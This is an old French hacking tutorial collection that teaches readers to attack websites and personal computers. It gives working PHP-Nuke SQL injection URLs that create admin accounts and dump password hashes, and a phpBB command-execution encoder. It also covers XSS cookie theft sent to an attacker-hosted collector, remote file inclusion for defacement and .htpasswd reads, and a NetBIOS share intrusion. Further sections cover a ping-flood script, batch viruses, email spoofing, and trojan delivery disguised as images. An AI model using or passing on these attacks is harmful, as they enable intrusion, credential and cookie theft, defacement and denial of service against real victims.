Quesque PHP NUKE? PHP NUKE est un portail en php trés
facile d'accés nul besoin de si connaitre en programmation
web... Malheuresement ce portail permet de nombreuse injection
SQL...
Comment faire une SQL injection? Voici comment ce mettre amdin
sur le site:
www.lesitephpnuke.com/admin.php?op=AddAuthor&add_aid =loadation_aos&add_name=God&add_pwd=jadore&add_emai l=tony@aos.com&add_radminsuper=1&admin= eCcgVU5JT04gU0VMRUNUIDEvKjox
Une
fois l'injection faite allez vous indenfier dans www.lesitephpnuke.com/admin avec les identifiants
suivant:
login: loadation_aos mot de passe: jadore
Et voila si
le webmaster ne s'est pas protéger(patch ou version + récente)vous aurez les
droits d'admin...
Comment regarder les message personnel des
admins: www.lesitephpnuke.com/modules.php?name= Private_messages&file=index&folder=inbox&user= eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
Comment
uploader et modifier les download du site: www.lesitephpnuke.com/modules.php?name= Downloads&d_op=modifydownloadrequest&lid= -1%200UNION%20SELECT%200,username,user_id, user_password,name,user_email,user_level,o,o%20FROM%20nuke_users
Comment
recuperer les mot de pass cryptés des admin : www.lesitephpnuke.com/modules.php?name= Search&type=stories&query=f00bar&category= -1&categ=%20and%201=2%20UNION%20SELECT%200,0, aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
Il
y a plein d'autre SQL injections mais à vous de les trouver, et bien sur, ces
injections sont valable juste pour phpNuke !!
Alors qu'est ce que cette faille highlight ? C'est une
faille qui touche tout les forum phpbb < v 2.0.10 (quand je dit tout... euh,
ce qui ne sont pas patchés !) Et qui vas permettre d'avoir un shell arbitraire
sur le serveur cible! une "shell nianian" quoi ? Shell = execution, grace
a cette faille vous allez pouvoir executer tout ce que vous voudrez sur le
serveur cible !
Commen proceder ? Alors la faille est contenue dans le
fichier "viewtopic.php"... Je sais, ca ne vous avance pas beaucoup mais c'est
bon a savoir pour la culture general ! Sur les forum phpbb il est possible
d'effectuer une recherche, et, apres avoir effectuer une recherche sur un mot
vachement courant comme "bonjour" ou autres, de multiples choix de topic
arrivent devant vos yeux ebahis. Quoi de plus normal me diriez vous ? Et je vous
repondrez de continuer a lire... Cliquez sur n'importe lequel des resultat,
et vous accederez au topic dans lequel a été trouvé le mot a rechercher, ici
"boujour". Attention, on en arrive a la faille ! Vous pouvez voir aussi que
le mot bonjour est en gras !!! Et que l'url finira comme ceci
"&highlight=bonjour" ! C'est la que reside la faille ! On vas pouvoir
replacer "bonjour" par n'importe quel commande DOS ! C'est t'y pas zoli ca ?
grace a cela vous pourrez faire ce que bon vous semble du serveur ! Alors
petit probleme, c'est que la commande aura une syntaxe assez specialle... Par
exemple, il ne faudra pas faire
&highlight=dir Mais &
highlight=%2527%252esystem(chr(100) %252echr(105)%252echr(114))%252e%2527
Oula...
Un peu compliqué tout ça non ? Mais alors comment savoir l'équivalent correct
d'une commande ?? Et bien j'ai pensé a tout ! je vous ai programmé en vb6 un
petit exploit qui vous permetra de "transcrire" n'importe quel commande (dir,
del, format...etc.) en son equivalent correct (
chr(100)%252echr(105)%252echr(114))%252e%2527 ...etc.) Ammusez vous bien
! Ci-dessous, la source de l'exploit commentée
Private Sub
Command1_Click() ' des que l'on cliquera sur le bouton command1 ... If
Text1.Text <> "" Then
Text2.Text = "" 'réinitialisation de la zone
de texte "resultat" Text2.Text = "%2527%252esystem(" 'voici le debut de notre
"requette" 'qui reste inchangée 'quelque soit la commande
Dim a As
String 'declaration de la variable qui vas contenir 'toute les lettres une a
une de notre commande a 'traduire
For intI = 1 To Len(Text1.Text)
'debut de la boucle qui vas se repeter autant de fois 'qu'il y a de
caractères dans la zone de text qui 'contient notre commande a =
Mid(Text1.Text, intI, 1) ' la variable "a" est egale au premier caractère '
de la zone de texte qui contient la commande 'au premier tour de boucle, le
deuxiemme caractère 'au deuxieme tour de boucle...etc. If intI <>
Len(Text1.Text) Then 'si intI (qui est egale au nombre de fois 'que c'est
repété la boucle) est different 'du nombre de caractères que contient la zone
de texte 'qui contient la commande Text2.Text = Text2.Text & "chr("
& Asc(a) & ")%252e" ' alors la zone de texte du resultat est egale a
elle ' meme ainsi que
"chr(Le_Code_Ascii_du_caractère_contenu_dans_a)%252e"
Else
'autrement ' la meme chose mais sans le )%252e final ! Text2.Text =
Text2.Text & "chr(" & Asc(a) & ")" Exit For ' et on sort de la
boucle
End If ' fin de la condition '''''''''''''' Next intI '
delimite la boucle
Text2.Text = Text2.Text & ")%252e%2527" ' des que
tout ca est fini, ou rajoute ca au resultat
Else MsgBox "Oh ! Il faut
metre quelquechose dans la zone de texte boudiou !" End If End Sub '
action terminée
Private Sub Command2_Click() MsgBox "Merci beaucoup
ice' ! Cette exploit je ne l'aurais jamais créer sans tes conseils"
End
Sub
Private Sub Command3_Click() Text1.Text = Combo1.Text End
Sub
Private Sub Form_Load() Combo1.AddItem "dir" Combo1.AddItem
"qprocess" Combo1.AddItem "tasklist" Combo1.AddItem
"qprocess" Combo1.AddItem "net stop" Combo1.AddItem
"tskill" Combo1.AddItem "taskkill" Combo1.AddItem "del" Combo1.AddItem
"format" Combo1.AddItem "shutdown" End Sub
Tout d'abord quesqu'une faille xss??? Une faille xss
c'est quand on a possibliter d'insérer du HTML ou Javascript dans un livre
d'or,chat ou forum... Grace à cette faille on peut par exemple faire une
alert,une redirection ou meme recupere les cookies des visiteurs.
Comment
trouver cette faille??? C'est simple il suffit d'insere un petit message
entre 2 balise tel que <i>Yop a la noix de coco</i>... Si le
texte est en italique,la faille est présente...
Que faire de cette
faille??? On peux par exemple faire un message d'alert,ce qui donnera
ça: < script>alert('Hacked by
SpyneNetwa')</script>
Dorénavant quand on ouvra cette page le
message "Hacked by SpyneNetwa" s'affichera...
Quelque fois le HTML n'est
pas autorisé et la il va falloir changer de technique,en effet il suffit juste
d'intégrer ça: [img]javascript:alert('Hacked by
SpyneNetwa')[/img]
Explication?Quand le serveur exécute la page il trouve
les balise image et cherche son contenu,ne trouvant pas d'image il met le
script. On peut aussi se servir de la balise plaintext pour afficher le code
en texte...
Comment récupérer les cookies? Il va falloir heberger une
page appelé recup.php... Dans la page recup.php on met le code
suivant:
< ? if($ cookie){ $fp=fopen(" cookies.txt","a"); // On
ouvre le fichier cookis.txt fputs($fp,"$ cookie\r\n"); // On écrit le contenu
du cookie dans le fichier fclose($fp); } ?> <
script> opener=self; self.close(); // ferme la fenètre < /
script>
Bon ensuite on retourne sur le forum et on poste une
xss: Amener moi vos cookies<script>window.open(" http:// www.votresite.fr/recup.php? cookie="+document. cookie);</
script> .
Et voila sur votre ftp un fichier cookies.txt va se créer ou
vous pourrer récupérer les cookies...
Pour se proteger, vos codeur PHP ne
doivent pas oublier qu'il existe une fonction qui permet d'enlever les balises
HTML et PHP => strip_tags(); !
1) Quesque c'est t'y cette chose ? La faille include
c'est la possibilité d'inserer du code malveillant dans une page deja
existante. Je traduit => si vous trouvez une faille include sur un site,
vous pourrez faire a peu pres tout ce que vous voudrez avec !
2)
présentation Tout d'abord qu'est ce que ce "include" dans "faille include" et
bien, les include sont les outils des fegnants ! Au lieu de repeter des
centaines de fois la meme protion de code, on créer une page
"portion_de_code.php" puis on l'inclus la ou en a besoin grace a la commande
"include". exemple =>
<? // code quelquonque ... //
didonc, ici j'aurais bien besoin du code long et chian que je doit mettre au
moins 10 fois dans toute les pages de // mon site ! // // A mais
j'alais oublier, c'est cool alors ! Je n'ai pas besoin de me faire chier a le
taper, vue que le l'ai mit dans la // page "code_long_et_chiant_a_taper.php"
!!
$page_a_inclure = "code_long_et_chiant_a_taper.php"; // je stoque le
nom du fichier dans une variable (dans une boite) include("$page_a_inclure");
// et je l'inclut !
// Cool je ne me suis pas fait chier a taper tout le
code ! A la place, j'ai tapé que 2 mini-ligne de code !
cooool ?>
3) Exploitation alors, c'est bien zoli tout ca mais
comment voit on si une page est incluse ? regardez l'adresse suivante
:
http://siteouaib.com/index.php?page=coolCaAlors.php
remarquez
bien le "page=coolCaAlors.php" La page "coolCaAlors.php" a été incluse
!!
Cela ne veut pas dire pour autant que le site est vulnerable ! Alors
procedons a un test : a la place de : http://siteouaib.com/index.php?page=coolCaAlors.php essayez http://siteouaib.com/index.php?page=http://www.google.com
si
google s'affiche au beau milieu de la page, c'est que le site est vulnerable
! C'est donc la que reside cette faille , dans le fait que l'on peut inclure
n'importe quel page au sein d'une autre
si on met :
http://sitealacon.com/index.php?page= http://www.http://users.rockweb.org/Raven45
Le site
sera inseré dans index , si ce n'est pas le cas c'est donc que la faille est
bouchée Cette faille donc va nous permettre d'inserer un code malveillant
venant d'un autre site sinon mieu du notre ^^ ex : sur mon site je crée un
fichier inc.php et dedans je met
:
<? $fichier=fopen('index.php','a'); //cette ligne ouvre le
fichier index.php fwrite($Fichier,'Web Site Defaced'); // Cette ligne ecrit
dans index.php fclose($fichier); // On ferme le fichier ,
Facultatif ?>
Donc on a cette page sur notre serveur que je nomerai
http://toto.fr Maintenant on
procede a l'inclusion : http://sitealacon.com/index.php?page=http://toto.fr/inc
Et
voila le site est "defacé", du moins, la page principale a été modifié pour
simuler un defacage vu que les autre page sur le serveur sont intactes
!
C'est ti pas bo tout ca ?
Mais attention !! il ne faux pas
mettre : http://sitealacon.com/index.php?page=http://toto.fr/inc.php
mais http://sitealacon.com/index.php?page=http://toto.fr/inc
car sinon le fichier sera interpréter sur votre serveur !!
4)
L'include local
Sachez que grace a la faille include, vous pouvez aussi
inclure des fichier interessant présent sur le serveur cible ! (passwd.txt,
htacces, htpassd, la DB ...etc.) un exemple suffira a vous faire comprendre
:
http://sitealacon.com/index.php?page=protect/.htpasswd
Et
tadaa, htpasswd s'affiche au beau milieu de la page !
5) Correction de la
faille
C'est bien joli de s'avoir l'exploiter cette faille, mais encore
faudrait il savoir la corriger !! Au lieu de mettre le code de l'exemple on
va remplacer par ca :
< ? $page_a_inclure =
"code_long_et_chiant_a_taper.php"; if (file_exists($page_a_inclure)) {
//verifie si le fichier existe bien sur le
serveur include("$page_a_inclure.php"); //inclus la page EN PHP } else
{include("404.php");} //inclusion d'une page d'erreur ?>
Alors qu'est ce qu'un exploit ? Un exploit est un petit
programme, créer le plus souvant en C, perl, python, php et qui a pour but
d'exploiter une faille ;-) Je ne vais pas ici vous lister tout les exploit
existants mais vous donner les site ou vous pourrez trouver les touts derniers
exploit pour tout ce que vous voulez : http://packetstormsecurity.org http://www.osvdb.org http://www.securitytracker.com http://www.vulnerabilite.com http://www.securityfocus.com http://www.k-otik.com http://packetstormsecurity.nl/ http://www.iss.net/ http://8088.org http://www.securiteam.com/ http://phreak.com/html/main.shtml http://www.hoobie.net/security/exploits/ http://www.secureroot.com/category/hacking/ http://www.astalavista.com/index.php?section=dir
2)
Utiliser
En voila une question qui revient souvent ! Apres avoir lut
ce tuto vous saurez determier en quel language l'exploit a été codé, puis vous
saurez l'utiliser !
Alors, comment ai-je fait pour le savoir ! Et
bien il y a des "indices" dans chacun des codes qui nous permet de le savoir
!
Si dans un exploit vous voyez des #include
<quelquechose.h> Et des printf(quelquechose); Vous pouvez etre
sur que l'exploit a été codé en C ! Mais, comment s'en servir ? Il vous
faut un compilateur C comme DevC, quincy, borland C . . . E t c. Puis grace a
ces logiciel, créez un nouveau projet, puis une feuille de code dans laquel
l'exploit, enregistrez, puis incluez la au projet, et pour finir C O M P I L E Z
et E X E C U T E Z !
Si dans un exploit vous voyez des $quelquechose =
quelquechosed'autre; Vous pouvez etre sur que l'exploit a été codé en PHP
! Alors pour vous en servir, vous devez telecharger le logiciel EasyPHP,
l'installer, l'executer, puis créer un dossier "Mes Exploits" dans \Program
Files\EasyPHP1-8\www\ Ensuite vous allez mettre la source de votre exploit
dans le bloc note et enregistrer sous "Ce_Que_Je_Veut.php" puis deplacer ce
fichier dans \Program Files\EasyPHP1-8\www\Mes Exploits Ensuite, faite un
click droit sur la petite icone en forme de E qui s'est placé a gauche de
l'heure (a droite de la barre demarer ( . . . ) ) et cliquez sur "Web Local"
. Une fenetre s'ouvre, cliquez sur le bouton "Mes Exploit" et admirez le
travail !
Si dans un exploit vous voyez : < html> Ou pleins
d'autres balise (
<jeSuisUneBaliseVuQueJeSuisEncadréDePlusPetitEtPlusGrandQue> cf tuto HTML
partie tuto divers ) Soyez sur, c'est du HTML ! Pour l'utilisez, ouvrez le
bloc note, deposez y la source de l'exploit, puis enregistrez sous
"CeQueVousVoulez.html" et executez (ou faites executer a la victime. . . Enfin
ca depend de l'exploit)!
Si en entete d'un exploit vous
voyez #!/usr/bin/perl Soyez certain, c'est du perl ! Pour s'en servir,
telechargez le programme ActivPerl, installez le. Parallèlement mettez la source
de votre exploit perl dans le bloc note et enregistrez sous
Ce_Que_L_On_Veut.pl Maintenant, demarer>executer>command (ou cmd) >
perl Le_Chemin_Complet_De_Votre_Exploit_Perl Exemple perl
c:\monexploit.pl Vous obtiendrez alors des infos sur les paramètres a
definir. Les paramètres ? Kesako ?? Imaginez un exploit qui permet de
detruire n'importe quel site ! Juste en indiquant L'URL du site et l'ID le
l'admin ! Et bien il vas falloir l'indiquer a l'exploit ! On aura donc un truc
dans le genre perl c:\exploitGenial.pl http://www.Le-Site-a-Detruire.com administrateur Et bien
"http://www.Le-Site-a-Detruire.com" et "administrateur" sont des paramètre a
l'exploit ! Donc pour avoir des infos sur les paramètres a indiquer a
l'exploit : perl c:\monexploit.pl (sans paramètres !) Puis grace aux
info qu'il vous sera donné, vous saurez exploiter l'exploit !
Si en
entete d'un exploit vous voyez #!/usr/bin/pyth0n L'exploit a été codé en
Python ! Pour s'en servir, telechargez le programme python, installez le.
Parallèlement mettez la source de votre exploit python dans le bloc note et
enregistrez sous Ce_Que_L_On_Veut.py Maintenant,
demarer>executer>command (ou cmd) > python
Le_Chemin_Complet_De_Votre_Exploit_Perl Exemple python
c:\monexploit.pl Vous obtiendrez alors des infos sur les paramètres a
definir. Puis grace aux info qu'il vous sera donné, vous saurez exploiter
l'exploit !
Alors tout d'abord qu'est ce que le SQL ?? Le SQL est un
language devoué a la gestion de base de donnée. ==> traduction : Quand, par
exemple, vous vous inscrivez sur un site, toute les info que vous avez entrer
pour votre inscription (email, pseudo, mot de passe...etc.) Sont stoquée dans
une DB (=> Data base => base de donnés), Et pour acceder a cette DB,
modifier son contenu...etc. On utilise le SQL !
Alors, venons en a
l'attaque... Mettons un site, dans lequel il y a un champ de recherche qui vas
vous permettre de rechercher un membre... En fait, quand vous allez cliquer sur
le bouton "rechercher", une requette vas etre envoyé sur la DB. Requette
: SI dans la partie Membre de la DB il y a un membre qui a pour nom "contenu
du champ de texte" alors on affiche le resultat !
Au lieu de dire "partie
membre" je vais employer le therme de TABLE membre... Alors une table est donc
une partie de la DB ! Une DB est en effet secionné en une ou plusieurs table
dans lequel sont stoqué les information correspondantes ! Par exemple la
table membre qui vas contenir votre pseudo et votre mot de passe Ou la table
NewLetter Qui contiendra votre e-mail ! En SQL la requette aurais resembler a
ceci :
SELECT * FROM membres WHERE pseudo =
'ContenuDuCHampDeTextt';
En fait une injection vas viser a deformer cette
requette ! Reprenons un exemple d'un site dans lequel deux champ de texte a
renseigner, l'un un pseudo et l'autre un pass. Si le pseudo existe dans la
DB(plus precisement dans la table membre) ainsi que le pass, alors on peut
continuer... En SQL :
("SELECT * FROM membres WHERE utilisateur =
'$contenuDuChampPseudo' AND motdepasse =
'$ContenuDuChampMotDePasse'");
Maintenant, si je met dans le premier
champ (le champ pour donner le pseudo) ceci :
' OR 1=1"); //
Notre
requette vas resembler a ceci :
("SELECT * FROM membres WHERE utilisateur
= '' OR 1=1"); //' AND motdepasse = '$ContenuDuChampMotDePasse'");
On a
ici TOTALEMENT deformer la requette, en français ça donne ceci !
Si le
pseudo(= Nom Dutilisateur) est egal a '' (et donc rien) OU que 1 est egal a 1
Alors je continue... Sachant que tout ce qui suit "//" est considéré comme
une note est donc n'est pas pris en compte ! On a fait ici une injection SQL
! Donc, en reflechissant, on peut avoir tout ce que l'on veut (mot de
passe...etc.) Encore un petit exemple :
login : '; exec
master..xp_cmdshell 'net stop firewall'; --
cette requête ci-dessus
aurait pour effet d'exécuter une commande shell "net stop firewall" qui
stopperait l'exécution du service "firewall" !
A vous de reflechir
maintenant !
Donc je vais expliquer comment utiliser une faille super
vieille mais qui marche encore: la faille netbios!
Mais d'abord, qu'est
ce que le serveur NETBIOs ? C'est la première question que je me pose!! Pas
vous? Bon, j'y répond quand même!! Le serveur Netbios est une couche
logicielle implantée sur les cartes réseau par toutes les versions de windows
jusqu'à XP. Ce serveur répond via TCP/IP à toutes les demandes via le port 137.
Ces demandes retournent les informations nécessaires à la connexion à votre
serveur de partage sur le port 139
En tout premier lieu, il faut
commencer par trouver une victime qui a le port 139 ouvert (le port du serveur
netbios). anecdote: win 98 instaure dès l'installation le partage de fichiers!!
^^ bon ok! Il suffit d'avoir updaté son OS ou d'avoir rectifié sa config soit
même. Et pis c'est vrai que win 98 c'est plus d'actualité. mais en cherchant
bien on trouve quelques utilisateurs négligeants, ou ignorants!
Pour
trouver votre victime, il faut utiliser un scanner d'ip comme nessus ou bien
superscan par exemple. Une fois la victime reperée, on teste le port avec une
commande dos:
nbtstat -A ip-de-la-victime
voilà ce qui apparait et
ce que l'on recherche c'est quelque chose du genre:
NETBIOS REMOTE
MACHINE NAME TABLE
NAME TYPE STATUS
____________________________________________ USERNAME <00>
registred WORKGROUP <00> registred USERNAME <03> registred
USERNAME <20> registred <----- C'est cette ligne qui m'interresse
:-)
MAC adress= 00-22-12-56-89-00 @
Quand on trouve "20" à"TYPE",
on peut etre sûr que la victime fait tourner un client micro$oft avec le partage
imprimantes/fichiers actif.
Bien! Maintenant, nous allons ajouter le nom
du REMOTE 20 au fichier "lmhost" dans windows. Ce fichier est utilisé par la
pile du client Wins (qui fait que le NetBios prime sur le TCP/IP) et contient la
redirection des adresses ip vers des noms d'ordinateurs.
Ce fichier est
divisé en plusieurs colonnes, la premier contient l'adresse ip, la seconde le
nom de la machine hote et la troisième et les suivantes des directives et/ou des
commentaires.
Donc on saisie toujours sous dos:
echo
ip-de-la-victime Nom-Du-Remote-20>>c:\windows\lmhosts <---- Le nom du
remote 20 ici, c'est USERNAME
Maintenand on reset le cache du netbios
avant de continuer
nbtstat -R Successful purge and preload on the NBT
remote cache name table
Maintenant, il ne nous reste plus qu'a lister les
ressources partagées sur la machine hôte
net view
nom-du-remote-20
A DISK C DISK D DISK Canon Printer The
command was completed successfully
et voila!!!!!!!!!!!!!!!!!!!!!!!
tadaaaaaaaaaaaaaaaaaaaaaaa vous avez acces aux ressources partagées de la
victime !!
Pour plus de confort, utilisez la recherche d'ordinateurs, ca
vous permettra de vous balader sur l'ordinateur hôte comme si vous étiez sur le
votre, Pour cela:
Démarrer -> rechercher -> rechercher d'autres
éléments (en l'occurence "ordinateurs") -> dans nom de l'ordinateur, on met
le nom du remote 20 (toujours USERNAME dans mon cas).
Ceci est une technique de hacking tres facile qui vous
permetra de vous loger en admin (avoir tout les droits !) sur un forum
phpbb d'une version egale ou inferieur à 2.0.12.
Petite preparation
:
- IL VOUS FAUT FIREFOX ! Cette exploit ne marche pas avec IE !!
(Firefox est un explorateur dans le genre IE, mais en mieux ;-) ) - Une
tete ,et au moins une main
Sachez avant tout que firefox stoque TOUT les
cookies dans un seul fichier ("cookies.txt"), (contrairement à IE qui créer
un fichier pour un cookie). Ce fichier est stoqué ici :
-\WINDOWS\Application Data\Mozilla\Firefox \Profiles\4sygtyn0.default
(pour les win 9x) -\Documents and Settings\votre nom(admin du
pc)\Application Data\Mozilla \firefox\profiles\tk2zmflp.default (pour les win
NT)
Passons maintenant à la pratique...
1) Reperer le forum
victime (Ca a l'air tout con dit comme ca... Mais c'est pas aussi simple
!) 2) Verifier que sa version est < 2.0.12 (marqué en bas de la
page) 3) Fermez toute les fenetre 4) Comme vous avez lancé le forum, il
vous place un cookie placé dans cookies.txt, OUVREZ cookies.txt . 5)
Cherchez dans cookies.txt ceci "phpbb2mysql_data", et vous pouvez voir qu'il en
suit une chaine de caractères qui commence par un "a" et fini par un "D". 6)
Remplacez cette valeur par celle-ci
:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6 %3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
7)
Ouvrez Firefox, et rendez vous sur le forum
En bas du forum vous voye apparaitre
"Panneau d'administration" ou "Administrateur Pannel" 9) Cliquez dessus et
TADAAAAAAAAAA, vous pouvez faire tout ce que vous voulez !
Petite note :
Ne fait pas ça à n'importe qui ! Ce serais bete et mechant !!
Je vais vous apprendre ici une technique assez simple pour
faire bugger un ordinateur.
Pour faire bugger un ordinateur à distance il
faut que sachiez son IP et surtout il faut que cet ordinateur n'ai pas de
FireWall. Nous allons créer un petit fichier batch qui envoira des donnés en
masse à l'ordinateur victime. Source du fichier batch :
@echo
off :start ping IP_Victime -l 65500 goto start
Vous enregistrez
le fichier sous "nimporteQuelNom.bat" puis vous l'executez et vous attendez et
le tour et joué.
Nous allons créer des virus en batch, alors pour ca, vous
avez besoin : - De Batch Creator OU du bloc note (demarer > programme >
accessoire > bloc note) - D'une tete - De au moins une main
Et
je pense que c'est tout ...
Bien que tout soit expliqué dans batch
creator, je réexplique (les parties les plus importantes !)
il faut que
vous ecriviez sur la 1ere ligne : @echo off cela permettra qu'aucune chose
""""disgracieuse"""" ne soit affiché (en simplifiant vraiment beacoup (plus de
details : telechargez Batch Creator!!!) Puis apres ce "@echo off" vous
mettrez des commandes, qui auront un effet bien specifique mais, attention :
Pour une ligne, un commande !
exemple de commande :
ECHO votre
message Affiche votre message
%windir%\RUNDLL32.EXE
User.exe,ExitWindows Eteint l'ordinateur (en fait ceci n'est pas vraiment une
commande... mais je ne m'attarderais pas sur cela)
DEL chemin Effache
le fichier "chemin" (exemple : DEL C:\windows\bureau\test.txt)
DELTREE /Y
chemin Efface le dossier "chemin" ainsi que tout ce qu'il contient le /Y
permet qu'il n'y ai pas demande de confirmation avant d'éffacer (ce qui est le
cas sans le /Y)
PAUSE attend que l'on appuie sur ue touche pour
continuer
EXIT Quitte la session DOS courante.
COPY chemin1
chemin2 copie le fichier chemin1 en chemin2 (meme fonctionnement pour
MOVE qui deplace des fichier)
CLS efface le contenu de la sortie
standard (pour simplifier : efface le contenu de la fenetre)
SET
NomDeLaVariable=Contenu de la variable donc ici, je déclare un variable ...
alors qu'est une variable? Ben une variable c'est une sorte de boite dans
laquel je met tout ce que je veut dedans ! exemple :
set cool=bonjour
mon ami comment ca va ? echo %cool%
Il ne vas pas s'affichier %cool%
mais le contenu de la variable cool ( soit "bonjour mon ami comment ca va ?"
) A noter qu'une variable ne peut etre utilisé qu'encadré par des
pourcentages ( %MaVariable% )
%0 Bon %0 n'est pas une commande mais
une vaiable tres utilisée !!! Le contenu de cette variable est en fait le
chemin du batch executé (Remarquez que cette variable n'est pas encardé par
des pourcentages mais n'en a qu'un seul a sa gauche !)
FOR Bon, la
syntaxe de cette commande est la suivante FOR %%var IN (valeurs) DO COMMANDE
%%var En fait la variable %%var vas perendre succesivement les valeurs
comprises entre parenthèses Puis cette variable est utilisé ensuite couplée a
une commande Exemple : FOR %%a IN (cool ca va ?) DO ECHO %%a Il vas
s'affichier à l'écran : cool ca va ?
Car j'ai affiché grace à
"echo" la variable %%a qui a pris les valeurs comprises entre les
parenthèse
>>, <<, >, <, | Ce qu'il y a au dessus
sont des redirection, explication : elles permètent de rediriger une commande
vers autre choses Exemple : echo coucou ca va ? >
c:\windows\bureau\testCool.txt
"echo coucou ca va?" vas etre redirigé
vers le fichier "c:\windows\bureau\testCool.txt" qui, si il n'existe pas, vas
etre créé, et ce fichier texte aura pour contenu "coucou ca va ?" Mais si
il existe, son contenu sera totalement éffacé pour qu'il y ai à la place "coucou
ca va ?", pour que "coucou ca va ?" soit seulement rajouté, utilisé plutôt
cette redirection : ">>" qui, si le fichier existe, rajoutera seulement
"coucou ca va ?", et si il n'existe pas, il sera créé aussi !
Les
redirections << et < sont peu utilisés donc je ne m'attarderais pas
dessus... la redirection | (laisser le doight apuié sur ALT GR et appuis sur
6 ) redirige une commande vers une autre exemeple echo. | DATE il vas
seulement s'affichier la date vu que la commande date est redirigée vers echo.
(alors que normalement la commande date demande à entrer la date ) Alors si
on mèle les deux ca peut donner : echo. | date >>
c:\windows\bureau\test2.txt Donc si on lance ca, la date du lancement du
fichier vas etre stoqué dans le fichier "c:\windows\bureau\test2.txt"
Je
ne vais pas en dire plus vus que bon nombre de commandes sont expliqués dans
"batch creator" (que vous pouvez telecharger dans la partie
telechargement)
Pour avoir des exemples concrets de virus batch, je vous
invite à consulter la partie "virus batch
Dans cette partie, vous apprendrez à envoyer des mail
anonyme avec telnet, et ceci tres simplement ! Ce qu'il vous faut :
-
Telnet (deja sur windows) Ou Eric's TelNet - Au moins une main
Lancez
telnet (Demarer>executer>telnet), Vous voyez une fenetre blanche
s'afficher a l'écran, dans celle-ci, faites : Connexion>Systeme distant +
Nom de l'hote : un serveur SMTP (exemple : smtp.wanadoo.fr,
smtp.voila.fr...) + Port : 25 (port SMTP) + Type de terminal : ne touchez
a rien... Puis OK
Pour l'exemple, je me connecterais au serveur SMTP
Wanadoo...
220 mwinf1208.wanadoo.fr ESMTP ABO ***************** Helo
wanadoo 250 mwinf1208.wanadoo.fr mail from:
<L'adresse_pour_laquel_vous_voulez_vous_faire_passer> 250 ok (petite
parhentèse : le code 250, signifie que tout est OK) rcpt to:
<adresse_victime> 250 ok data (RE-petite parhentèse : lorsque
nous entrons "data", nous indiquons au serveur que nous avons fini de remplir
les informations au sujet du "destinataire/recepteur" et que nous allons
commencer a taper le message) 354 End data with
<CR><LF>.<CR><LF> subject: titre du message
aucune reponse du serveur Puis tapez votre message et finisez le par un
point sur une ligne vide Pour se deconecter apres avoir fini :
"quit"
Voila, vous avez envoyé un mail anonyme !
Tout d'abord qu'est ce qu'un trojan ? Un trojan est une
sorte de virus qui permet à quiconque connait votre ip, de penetrer votre
ordinateur . Explications : Les transferts de donnés sur internet se font
grace à un certains nombre de port, et à chaque port sa specificitée. Et bien un
trojan insecurise l'un de ces ports pour pouvoir exploiter et controler votre
pc. Ceci est bien beau (façon de parler) mais comment proceder ? Tout les
trojans sont composés de 2 parties :
- Le client - Le
serveur
Le client est la partie qui vas vous permetre de controler le pc
à distance, quand au serveur, c'est la partie que la victime doit
executer. Dès lors, vous devez vous poser plusieurs questions... - Que ce
passe-t-il lorsque ma victime vas executer le serveur ? Il ne se passe
ABSOLUMENT rien ! Le serveur agit silencieusement. - Comment faire passer ce
serveur à ma victime ? Faites en sorte que la victime veuille executer le
trojan, dite que c'est un programme qui expose toute les positions du KaMasutra
ou encore faites lui croire que c'est une image en renomant le serveur
"imageKoKine.jpg.exe" - Que puis-je faire à partir du client ? Tout ce que
vous pouriez faire en étant devant le pc de la victime ! Supprimer, renomer
telecharger, controler la souris...etc. d'autres fonctions sont possible en
fonction du client , sachez qu'il existe une multitude de trojan !! - Ai-je
juste besoin de l'IP ? Oui ! Et il vous faut aussi une bonne dose de chance, car
si la victime possede un firewall il sera tres difficile de penetrer son PC
(mais pas imposible ! Rien n'est imposible en informatique)
Conseils
: Ne vous attaquez JAMAIS à une ip au hasard ! Il faut connaitre la victime !
Mettons par exemple qu'elle vous ai dit quel type de firewall elle posède, vous
pouvez agire en consequant (créer un petit programme que vous lui ferez executer
qui desinstalerait le firewall) ! Ceci n'est qu'un exemple parmis tant d'autres
!
Ci-dessous la liste des trojans les plus connus avec leurs port
correspondant :
PORT | NOM 31,Master Paradise 121,BO
jammerkillahV 456,HackersParadise 555,Phase Zero 666,Attack
FTP 1001,Silencer 1001,Silencer 1001,WebEx 1010,Doly Trojan
1.30 1011,Doly Trojan 1.1+1.2 1015,Doly Trojan
1.5 1033,Netspy 1042,Bla1.1 1170,Streaming Audio
Trojan 1207,SoftWar 1243,SubSeven 1245,Vodoo 1269,Maverick's
Matrix, 1492,FTP99CMP 509,PsyberStreamingServer Nikhil G. 1600,Shiva
Burka 1807,SpySender 1981,ShockRave 1999,Backdoor 1999,Transcout 1.1
+ 1.2 2001,DerSpaeher 3 2001,TrojanCow 2023,Pass Ripper 2140,The
Invasor Nikhil G. 2283,HVL
Rat5 2565,Striker 2583,Wincrash2 2801,Phineas Nikhil G. 3791,Total
Eclypse (FTP) 4567,FileNail
Danny 4950,IcqTrojan 4950,IcqTrojen 5000,Socket23 5011,OOTLT 5031,NetMetro1.0 5400,BladeRunner 5400,BackConstruction1.2 5521,IllusionMailer 5550,XTCP
2.0 + 2.01 5569,RoboHack 5742,Wincrash 6400,The tHing 6669,Vampire
1.0 6670,Deep Throat 6883,DeltaSource
(DarkStar) 6912,Shitheep 6939,Indoctrination 7306,NetMonitor 7789,iCkiller 9872,PortalOfDoom 9875,Portal
of Doom 9989,iNi-Killer 9989,InIkiller 10607,Coma
Danny 11000,SennaSpyTrojans 11223,ProgenicTrojan 12076,Gjamer 12223,Hack´99
KeyLogger 12346,NetBus 1.x (avoiding Netbuster) 12701,Eclipse
2000 16969,Priotrity 20000,Millenium 20034,NetBus
Pro 20203,Logged! 20203,Chupacabra 20331,Bla 21544,GirlFriend 21554,GirlFriend 22222,Prosiak
0.47 23456,EvilFtp 27374,Sub-7 2.1 29891,The
Unexplained 30029,AOLTrojan1.1 30100,NetSphere 30303,Socket25 30999,Kuang 31787,Hack'a'tack 33911,Trojan
Spirit 2001 a 34324,Tiny Telnet Server 34324,BigGluck
TN 40412,TheSpy 40423,Master
Paradise 50766,Fore 53001,RemoteWindowsShutdown 54320,Back Orifice 2000
(default port) 54321,Schoolbus 1.6+2.0 61466,Telecommando 65000,Devil
1.03
Il existe aussi des logiciels que l'on nomme "scaneurs d'ip" qui
